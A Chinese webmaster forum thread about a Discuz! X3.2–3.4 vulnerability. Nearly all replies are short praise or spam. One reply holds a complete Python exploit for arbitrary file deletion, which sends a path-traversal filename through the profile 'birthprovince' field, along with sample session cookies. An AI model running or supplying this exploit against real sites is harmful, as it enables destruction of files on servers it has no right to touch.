2核1G3M服务器88一季度

腾讯云,阿里云百度云等 折扣价→点我←

Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞 discuz 交流

游客1 游客组

站长窝论坛版权声明 1、本帖标题:Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞
2、论坛网址:站长窝论坛
3、站长窝论坛的资源部分来源于网络,如有侵权,请联系站长进行删除处理。
4、会员发帖仅代表会员个人观点,并不代表本站赞同其观点和对其真实性负责。
5、站长窝论坛一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本帖由游客1在站长窝论坛《程序综合区》版块原创发布, 转载请注明出处!
评论
最新回复 (186)
  • yrkjssg 一级用户组
    引用 2
    好帖子 顶一个
    2018/03/08 10:36:13 只看Ta 回复
  • 不曾止步 三级用户组
    引用 3
    果然厉害
    2018/03/13 20:43:36 只看Ta 回复
  • 夜泊康桥 一级用户组
    引用 4
    厉害了,老铁
    2018/03/26 14:13:51 只看Ta 回复
  • 小七50 一级用户组
    引用 5
    啦啦啦啦啦啦啦
    2018/04/03 06:28:21 只看Ta 回复
  • 微笑、纯属礼貌 一级用户组
    引用 6
    好帖 顶一个看看
    2018/04/08 10:07:12 只看Ta 回复
  • 时光依然 一级用户组
    引用 7
    这么厉害的操作。。
    2018/04/09 08:54:17 只看Ta 回复
  • DarkDog 一级用户组
    引用 8
    大叔大婶多无大所
    2018/04/11 20:28:09 只看Ta 回复
  • 刹那芳华 二级用户组
    引用 9
    这么狠。。。{:18:}
    2018/04/12 12:27:36 只看Ta 回复
  • Linn 一级用户组
    引用 10
    谢谢分享哦
    2018/04/13 14:54:46 只看Ta 回复
  • 再见夕阳 一级用户组
    引用 11
    Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞
    2018/04/17 21:51:07 只看Ta 回复
  • 乖宝宝 一级用户组
    引用 12
    厉害了
    2018/04/19 22:25:50 只看Ta 回复
  • 敏感字有点多 一级用户组
    引用 13
    关键是如何修复漏洞呢?
    2018/04/21 12:52:59 只看Ta 回复
  • 量使用 一级用户组
    引用 14
    谢谢分享哦
    2018/04/23 15:39:17 只看Ta 回复
  • 风林火山sdsd 一级用户组
    引用 15
    沙发上发生的发生的
    2018/04/27 10:27:29 只看Ta 回复
  • xdsxds 一级用户组
    引用 16
    啊啊啊啊啊啊啊啊啊啊啊啊阿啊啊啊
    2018/04/29 18:01:34 只看Ta 回复
  • 东软吴彦祖 一级用户组
    引用 17
    我来看看嫩嗯嗯嗯呢呢
    2018/05/02 21:07:09 只看Ta 回复
  • frehc 二级用户组
    引用 18
    感谢楼主分享 好人一生平安
    2018/05/04 03:27:06 只看Ta 回复
  • ForDream 一级用户组
    引用 19
    zczcz在此次错错错
    2018/05/04 14:50:14 只看Ta 回复
  • 與孒偕佬 一级用户组
    引用 20
    6666,看看好用不....
    2018/05/05 12:37:17 只看Ta 回复
  • 观心 一级用户组
    引用 21
    厉害:Q:lol:loveliness:
    2018/05/05 17:55:10 只看Ta 回复
  • ywy198463 一级用户组
    引用 22
    这个要学习一下了
    2018/05/06 21:23:05 只看Ta 回复
  • 网客会员 一级用户组
    引用 23
    正好试试。谢谢楼主
    2018/05/08 12:51:20 只看Ta 回复
  • 海盗123 一级用户组
    引用 24
    还有这种漏洞啊
    2018/05/10 13:18:57 只看Ta 回复
  • 快乐哈哈 一级用户组
    引用 25
    看看是怎么回事,好好学习一下!
    2018/05/11 13:19:30 只看Ta 回复
  • 456网赚官方认证 一级用户组
    引用 26
    RE: Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞 [修改]
    2018/05/15 18:42:57 只看Ta 回复
  • 游客 游客组
    引用 27
    我看看。。
    2018/05/16 11:56:17 只看Ta 回复
  • 祭奠吶逝去的青春 一级用户组
    引用 28
    台湾手套
    2018/05/18 11:15:05 只看Ta 回复
  • 哈哈刘 一级用户组
    引用 29
    看看....
    2018/05/19 19:44:41 只看Ta 回复
  • songdaxia 一级用户组
    引用 30
    过来看看。
    2018/05/23 10:19:36 只看Ta 回复
  • 23423242342 一级用户组
    引用 31
    好帖 顶一个看看
    2018/06/05 22:33:29 只看Ta 回复
  • 张扬12 一级用户组
    引用 32
    学习了
    2018/06/06 18:00:31 只看Ta 回复
  • Daemon 一级用户组
    引用 33
    RE: Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞 [修改]
    2018/06/06 23:09:46 只看Ta 回复
  • wusejason 一级用户组
    引用 34
    厉害了 看看 这么狠
    2018/06/08 15:07:45 只看Ta 回复
  • Henry 一级用户组
    引用 35
    奈斯很不错呐
    2018/06/08 17:22:44 只看Ta 回复
  • 你说地方 一级用户组
    引用 36
    测试112233
    2018/06/11 22:32:14 只看Ta 回复
  • 悠扬 一级用户组
    引用 37
    厉害了
    2018/06/12 10:35:07 只看Ta 回复
  • 嘘~~~听 一级用户组
    引用 38
    了LL连连看
    2018/06/13 15:31:56 只看Ta 回复
  • 梦羽 一级用户组
    引用 39
    很强...:D
    2018/06/18 16:38:57 只看Ta 回复
  • Mr_杰先生 一级用户组
    引用 40
    顶顶顶顶顶顶顶顶顶顶顶顶顶的顶顶顶顶顶多多多
    2018/06/18 17:47:31 只看Ta 回复
  • Goop 一级用户组
    引用 41
    真的好厉害
    2018/06/23 14:30:37 只看Ta 回复
  • 阿浪丰厚的 一级用户组
    引用 42
    阿浪丰厚的
    2018/06/25 20:05:13 只看Ta 回复
  • cnn 一级用户组
    引用 43
    discuz!框架的漏洞还真的多
    2018/06/26 21:09:02 只看Ta 回复
  • 封去 一级用户组
    引用 44
    可以牛逼666
    2018/06/27 16:41:25 只看Ta 回复
  • 小小峰 一级用户组
    引用 45
    我来看一下是什么
    2018/06/27 17:29:13 只看Ta 回复
  • 遗忘啊 一级用户组
    引用 46
    挺厉害的,学习一下
    2018/07/03 11:54:03 只看Ta 回复
  • 小老头小 一级用户组
    引用 47
    好东西,我看看哈
    2018/07/03 17:49:00 只看Ta 回复
  • 游客 游客组
    引用 48
    Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞
    2018/07/05 20:41:12 只看Ta 回复
  • qingduyuwo 一级用户组
    引用 49
    法国梵蒂冈地方官梵蒂冈是
    2018/07/06 21:55:02 只看Ta 回复
  • 别客 一级用户组
    引用 50
    必须过来看看
    2018/07/06 22:37:38 只看Ta 回复
  • 老虎爱吃肉 三级用户组
    引用 51
    Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞 [修改]
    2018/07/07 16:54:28 只看Ta 回复
  • 安全电影 一级用户组
    引用 52
    感觉很厉害啊,看看是什么情况。
    2018/07/10 13:13:20 只看Ta 回复
  • cgs106 一级用户组
    引用 53
    这个应该被修复了吧
    2018/07/10 18:46:31 只看Ta 回复
  • 谈网 一级用户组
    引用 54
    谢谢分析,搂住
    2018/07/10 21:25:09 只看Ta 回复
  • 90508 一级用户组
    引用 55
    谢谢lz
    2018/07/11 10:23:57 只看Ta 回复
  • 看下咋回事安居客附近撒货到公益免费接撒的和
    2018/07/11 11:08:58 只看Ta 回复
  • 豪杰兄 一级用户组
    引用 57
    学习一下 学习一下 看有用没
    2018/07/11 12:20:39 只看Ta 回复
  • 夏虫 一级用户组
    引用 58
    谢谢分享,查看一下漏洞
    2018/07/12 15:45:32 只看Ta 回复
  • 夏霞遐 一级用户组
    引用 59
    好强的样子 我看看
    2018/07/12 18:28:00 只看Ta 回复
  • 小胡军 一级用户组
    引用 60
    看看什么BUG漏洞。
    2018/07/14 15:14:39 只看Ta 回复
  • administrator32 一级用户组
    引用 61
    感谢,看看
    2018/07/15 07:41:14 只看Ta 回复
  • 习远平总书记 一级用户组
    引用 62
    萨芬的GV水电费感受到过十多个
    2018/07/18 13:17:14 只看Ta 回复
  • 天马行空dffdf 一级用户组
    引用 63
    不错。谢谢
    2018/07/18 15:08:20 只看Ta 回复
  • 零點 一级用户组
    引用 64
    的点点滴滴
    2018/07/19 09:19:17 只看Ta 回复
  • 啦啦啦test 一级用户组
    引用 65
    来看看看看,学习
    2018/07/19 15:32:55 只看Ta 回复
  • 啦啦啦test 一级用户组
    引用 66
    aaaa啊啊啊啊
    2018/07/19 15:37:52 只看Ta 回复
  • 974970545 一级用户组
    引用 67
    [修改]
    高级模式
    BColorImageLinkQuoteCodeSmilies

    本版积分规则参与/回复主题
    974970545设置新浪微博登陆 绑定百度帐户通知(1)快捷导航 退出收藏本站登录记录资源库资料库
    站长窝
    123

    帖子
    请输入搜索内容

    首页综合资源开通赞助(ViP)每日更新热门下载最新模板应用中心
    论坛任务每日签到宣传赚币个人中心空间动态精彩淘帖兴趣群组我的收藏排行榜领取勋章邀请注册
    站长窝»首页›站长交流专区›站长头条›Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏 ...
    国内真正的高防服务器远程图片本地化自动 v1.0.5 - DZ建站学习研究分享 · 插件 专业开源[1314]IT618威客插件5.1版安装问题小说阅读器 专业版9.9.4 还更新吗 长篇的采集不了建网站应该选择什么样的服务器?热度[柒瑞]开放式竞猜 ver2.6 带手机触屏版 Ver:V2.0--------下载地址[柒瑞]开放式竞猜 ver2.6 带手机触屏版 Ver:V2.0 DZ建站学习研究分享 · 插件MIP改造推送seo 推送失败 / 错误码:Quota free微信公众号流量变现——了解一下2018年7月19日站长窝签到记录贴远程图片本地化自动 v1.0.4 - DZ建站学习研究分享 · 插件 专业开源[1314]SEO超级伪静态 V3.6.8 高级版 - DZ建站学习研究分享 · 插件 专业开源[1314][1314]首页N格 V2.8.8 - DZ建站学习研究分享 · 插件 专业开源[1314]申请更新 视频课堂直播点播 高级教育版v4.3.3 DZ建站学习研究分享请问有没有志愿者模板或者源码啊N5城市门户系列-V9 导入DIY文件的问题淘宝客导购小程序1.0 集淘宝、京东、拼多多三位一体的返利导购小程序人才网站源码PHP云人才招聘系统V4.5版,新模板+新手机端 大气界面非常不错技术员联盟Ghost Win8.1 32位装机版V2018.07
    国内真正的高防服务器远程图片本地化自动 v1.0.5 - DZ建站学习研究分享 · 插件 专业开源[1314]IT618威客插件5.1版安装问题小说阅读器 专业版9.9.4 还更新吗 长篇的采集不了建网站应该选择什么样的服务器?热度[柒瑞]开放式竞猜 ver2.6 带手机触屏版 Ver:V2.0--------下载地址[柒瑞]开放式竞猜 ver2.6 带手机触屏版 Ver:V2.0 DZ建站学习研究分享 · 插件MIP改造推送seo 推送失败 / 错误码:Quota free微信公众号流量变现——了解一下2018年7月19日站长窝签到记录贴远程图片本地化自动 v1.0.4 - DZ建站学习研究分享 · 插件 专业开源[1314]SEO超级伪静态 V3.6.8 高级版 - DZ建站学习研究分享 · 插件 专业开源[1314][1314]首页N格 V2.8.8 - DZ建站学习研究分享 · 插件 专业开源[1314]申请更新 视频课堂直播点播 高级教育版v4.3.3 DZ建站学习研究分享请问有没有志愿者模板或者源码啊N5城市门户系列-V9 导入DIY文件的问题淘宝客导购小程序1.0 集淘宝、京东、拼多多三位一体的返利导购小程序人才网站源码PHP云人才招聘系统V4.5版,新模板+新手机端 大气界面非常不错技术员联盟Ghost Win8.1 32位装机版V2018.07
    站长窝建站学习手册发布 站长窝Discuz开发资料库发布 站长窝 - Discuz! 应用研发动态 关于站长窝贡献币与积分的详细说明,请点击查看详情!
    友链交换平台 建站学习研究资源分享白皮书发布 请各位站长窝会员加强账户安全,加紧验证邮箱! 本站已启用备用域名:www.cgzz8.com (请收藏备用!)
    1234567
    1
    / 7 页下一页
    返回列表发新帖回复
    Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞
    查看: 4069|回复: 65
    打印 上一主题 下一主题 Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞 [复制链接]
    民审-M

    3794
    主题
    8045
    热度
    7340
    贡献
    民审
    2018/07/19 16:10:32 只看Ta 回复
  • momoxiao 一级用户组
    引用 68
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import requests
    import re
    import urllib2

    ‘‘‘
    Discuz!X ≤3.4 任意文件删除漏洞
    Write by Aaron
    ‘‘‘

    def get_cookie():
    cookies={}
    for line in raw_cookies.split(‘;‘):
    key,value=line.split(‘=‘,1)
    cookies[key]=value
    return cookies
    def get_formhash(url):
    cookies=get_cookie()
    testurl=url+"/home.php?mod=spacecp"
    s=requests.get(testurl,cookies=cookies)
    com = re.compile(‘<input type="hidden" name="formhash" value="(.*?)" />‘)
    result = com.findall(s.text)
    return result[0]
    def del_step1(url,filename):
    headers={‘User-Agent‘:‘Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0‘}
    geturl=url+"/home.php?mod=spacecp&ac=profile&op=base"
    formhash=get_formhash(url)
    payload ={‘birthprovince‘:filename,"profilesubmit":1,"formhash":formhash}
    cookies=get_cookie()
    r = requests.post(geturl,data=payload,headers=headers,cookies=cookies)
    if r.content.find(‘parent.show_success‘)>0:
    print ‘Step1 success!!!‘
    def del_step2(url):
    geturl=url+"/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"
    heads={‘User-Agent‘:‘Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0‘}
    formhash=get_formhash(url)
    files ={‘formhash‘:(None,formhash),‘birthprovince‘:(‘1.jpg‘,open(‘1.jpg‘,‘rb‘),‘image/jpeg‘),‘profilesubmit‘:(None,‘1‘)}
    cookies=get_cookie()
    r=requests.post(geturl,files=files,headers=heads,cookies=cookies)
    if r.text.find(‘parent.show_success‘)>0:
    print ‘Step2 success!!!‘

    if __name__ == ‘__main__‘:
    #需要修改以下三个参数:
    #1、设置cookie
    raw_cookies="G2pl_2132_sid=sKKQZK; G2pl_2132_saltkey=Sz3Zk9qK; G2pl_2132_lastvisit=1506772875; G2pl_2132_lastact=1506779386%09home.php%09spacecp; G2pl_2132_seccode=7.aa0407e77fa5c31c1b; G2pl_2132__refer=%252Fhome.php%253Fmod%253Dspacecp%2526ac%253Dprofile%2526op%253Dbase; G2pl_2132_ulastactivity=d085JjIjS5HiG3obxleJQuw0zNYpIN60OXJV0J6di%2B8aFmKQ4u6l; G2pl_2132_auth=86c5F09hGuaZuGNPSX7Pr7Oy4Mq2B39nSviv%2FRFC8vdn1Zjb9PibvU2fN4jJr9Hr7yVNf2vH9rIXrSLWhMZk; G2pl_2132_nofavfid=1; G2pl_2132_sendmail=1; G2pl_2132_noticeTitle=1"
    #2、设置删除的文件
    filename="../../../111.txt"
    #3、设置url
    url="http://127.0.0.1"
    del_step1(url,filename)
    del_step2(url)
    2018/07/20 20:58:01 只看Ta 回复
  • 帕克 一级用户组
    引用 69
    蟹蟹楼楼的分享
    2018/07/23 02:32:34 只看Ta 回复
  • 刘印同学 一级用户组
    引用 70
    看看这个东西是怎么玩的的。
    2018/07/24 21:10:40 只看Ta 回复
  • sureapple 一级用户组
    引用 71
    真的大家厉害
    2018/07/24 23:25:43 只看Ta 回复
  • 三体 一级用户组
    引用 72
    厉害里哈厉害
    2018/07/25 13:53:59 只看Ta 回复
  • 早说啊 一级用户组
    引用 73
    尝试一下
    2018/07/26 09:12:42 只看Ta 回复
  • 开大嘴 一级用户组
    引用 74
    哇,这也行吗?
    2018/07/26 14:18:50 只看Ta 回复
  • 流浪的风 一级用户组
    引用 75
    支持了,看看
    2018/07/27 05:40:56 只看Ta 回复
  • 魂淡淡 一级用户组
    引用 76
    看眼,需哦写了
    2018/07/27 09:23:43 只看Ta 回复
  • aiyucheng 一级用户组
    引用 77
    ;Pdas阿三的地方范德萨
    2018/07/28 07:04:12 只看Ta 回复
  • hmm1313133 一级用户组
    引用 78
    看看,顶一个
    2018/07/31 16:19:45 只看Ta 回复
  • Tis 一级用户组
    引用 79
    厉害了!!!!!!1
    2018/08/01 23:24:54 只看Ta 回复
  • 爱死你 一级用户组
    引用 80
    按时大苏打
    2018/08/02 14:58:36 只看Ta 回复
  • fzfe001 一级用户组
    引用 81
    是什么好东西,值得我看!
    2018/08/03 11:28:51 只看Ta 回复
  • 淘淘1245 一级用户组
    引用 82
    Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞 [修改]
    2018/08/03 17:48:27 只看Ta 回复
  • 神话暗黑 一级用户组
    引用 83
    我想看看有没有这个漏洞
    2018/08/04 12:54:49 只看Ta 回复
  • 不知所云 一级用户组
    引用 84
    感谢楼主的分享....
    2018/08/04 23:14:45 只看Ta 回复
  • ヅ寶0oゞ氣ぃ 一级用户组
    引用 85
    发酵理论雕刻家发克拉加速度离开飞机安卡拉圣诞节发绿卡水浇地了罚款就
    2018/08/05 23:48:03 只看Ta 回复
  • 网站者 一级用户组
    引用 86
    先评论再说
    2018/08/06 21:30:41 只看Ta 回复
  • 网站者 一级用户组
    引用 87
    刚操作过了我现在过来看来有没有删除
    2018/08/06 21:35:38 只看Ta 回复
  • JKM123566 一级用户组
    引用 88
    膜拜大佬
    2018/08/07 10:17:08 只看Ta 回复
  • 荒荒之路 一级用户组
    引用 89
    学习的路太多
    2018/08/07 22:29:53 只看Ta 回复
  • 逆旅 一级用户组
    引用 90
    RE: Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞 [修改]
    2018/08/08 11:17:35 只看Ta 回复
  • 一一颗赛艇 一级用户组
    引用 91
    历害了老铁
    2018/08/08 12:10:42 只看Ta 回复
  • 帝君 一级用户组
    引用 92
    看一看好不好用
    2018/08/09 11:32:26 只看Ta 回复
  • seek◎lost 一级用户组
    引用 93
    永久删除你在任何DZ论坛的帐号漏洞 [
    2018/08/10 02:05:27 只看Ta 回复
  • 小嘀咕垃圾 一级用户组
    引用 94
    2会不会玩了?支援呢?人呢?会不会支援一下啊
    2018/08/10 04:46:02 只看Ta 回复
  • cacheyu 一级用户组
    引用 95
    厉害厉害
    2018/08/10 15:49:58 只看Ta 回复
  • 五路财神 一级用户组
    引用 96
    看看看看看看
    2018/08/11 08:36:28 只看Ta 回复
  • 游客 游客组
    引用 97
    看看啊,不催啊啊..
    2018/08/12 22:31:02 只看Ta 回复
  • 游客 游客组
    引用 98
    牛逼厉害,谢谢分享
    2018/08/13 11:18:06 只看Ta 回复
  • 游客 游客组
    引用 99
    太溜了 厉害
    2018/08/13 12:04:13 只看Ta 回复
  • 游客 游客组
    引用 100
    谢谢大神呀哈哈哈
    2018/08/13 23:16:58 只看Ta 回复
返回
发新帖